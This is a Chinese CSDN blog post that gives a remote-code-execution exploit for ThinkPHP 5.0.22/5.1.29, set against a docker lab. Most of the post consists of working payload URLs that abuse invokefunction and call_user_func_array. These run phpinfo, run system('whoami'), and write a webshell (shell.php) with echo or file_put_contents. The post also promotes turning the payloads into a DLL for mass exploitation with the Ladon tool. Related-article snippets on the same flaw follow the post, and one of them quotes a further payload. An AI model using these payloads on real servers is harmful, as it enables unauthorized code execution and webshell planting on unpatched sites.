ThinkPHP 5.0.22 5.1.29 GetShell Exploit

最新推荐文章于 2024-08-02 16:43:18 发布
最新推荐文章于 2024-08-02 16:43:18 发布
阅读量1k 收藏 1
点赞数
分类专栏: Exp GetShell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/103941233
版权
Exp 同时被 2 个专栏收录
16 篇文章 3 订阅
订阅专栏
GetShell
10 篇文章 2 订阅
订阅专栏

前言

使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

Payload:

http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行命令

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit

k8gege
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP 远程命令执行漏洞复现(GetShell) 5.0.22版本
weixin_44133711的博客
05-11 1334
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。 漏洞危害 攻击者可通过该漏洞获取网站的...
Thinkphp 5.1.41 getshell
qq_41619801的博客
06-23 2075
首先需要实现反序列化,找到传参数的位置。影响thinkphp 5.1.37——5.1.41测试可以自己实现一个函数为了实现反序列化自动执行的魔法函数,要找到一个析构函数,thinkphp\library\think\process\pipes\Windows.php中有一个继续跟进removeFiles()file_exists会将$filename当作字符串进行处理,触发任意类的__toString()这时候需要找到一个__toString函数能继续向下执行的类,全局搜索。
thinkPHP5.0.22
12-06
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产品发布/销售。
RCE(远程代码执行漏洞)原理及漏洞利用
最新发布
m0_52484587的博客
08-02 673
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。
Thinkphp 5.0.22
11-19
这是tp5.0框架资源。。
thinkphp remote exploit
cnbird's blog
05-08 1332
lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@print(phpinfo())%7D
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 991
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...
thinkphp5.0.23
weixin_51558394的博客
08-17 1689
thinkphp 5.0.23远程代码执行
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 654
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP_getshell-v2.zip
11-11
而提供的“ThinkPHP_getshell-v2.exe”文件,很可能是用于检测这个特定漏洞的工具,它可能是一个扫描器或exploit,帮助安全专家或者开发者检测他们的系统是否受到此漏洞的影响。 在ThinkPHP 5版本中,可能存在如SQL...
python3编写ThinkPHP命令执行Getshell的方法
09-19
### Python3 编写 ThinkPHP 命令执行 Getshell 的方法详解 #### 一、背景介绍 在 Web 应用开发中,ThinkPHP 是一个非常流行的 PHP 框架,因其良好的性能与丰富的功能而受到众多开发者的青睐。然而,任何框架或技术...
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3234
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
thinkphp5.0.22--日志分析和错误调试
weixin_30686845的博客
12-01 194
但凡遇到php页面报错信息,我们可以借助phpgjx工具,一款类似postman的工具来跟踪导致问题的sql信息,这工具的实质是一款文件夹和文件组合,通过Apache和nginx部署 分析排查这类问题时,通常看报错信息的最后一句,因为对于php这种语言来说,遇到错误脚本就停止执行了。 关键配置信息 网站的性能瓶颈,大多由mysql数据库查询导致,这使得为提高访问效率的缓存技术在网站部署过...
ThinkPHP5.0版本 远程命令执行漏洞GetShell
09-02 291
https://blog.csdn.net/Fly_hps/article/details/84954664 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控...
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现
weixin_52347768的博客
03-28 4575
远程代码执行漏洞作用: 攻击者向后台服务器远程注入操作系统命令或者代码,进而控制后台系统 远程代码执行漏洞的原理: 由于部分应用系统从设计上需要给用户提供指定的远程命令操作的接口,如果没有做严格的安全控制,可能会导致攻击者通过该接口提交恶意的命令,从而让后台进行执行,从而控制整个后台服务器。 由于需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 启动环境,访问http://159.75.16.25:8087,看到启动界面 进行复现,poc: /i
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2985
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_45653478的博客
04-27 997
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞。
TP5.0.24漏洞分析:getshell尝试与exploit
本文主要记录了一次针对ThinkPHP 5.0.24版本的getshell尝试,getshell是指在Web应用程序中获取服务器shell权限的一种攻击手段。作者提到这个站点可能是阉割版的TP5.0.24,通常认为这个版本不应该存在远程代码执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值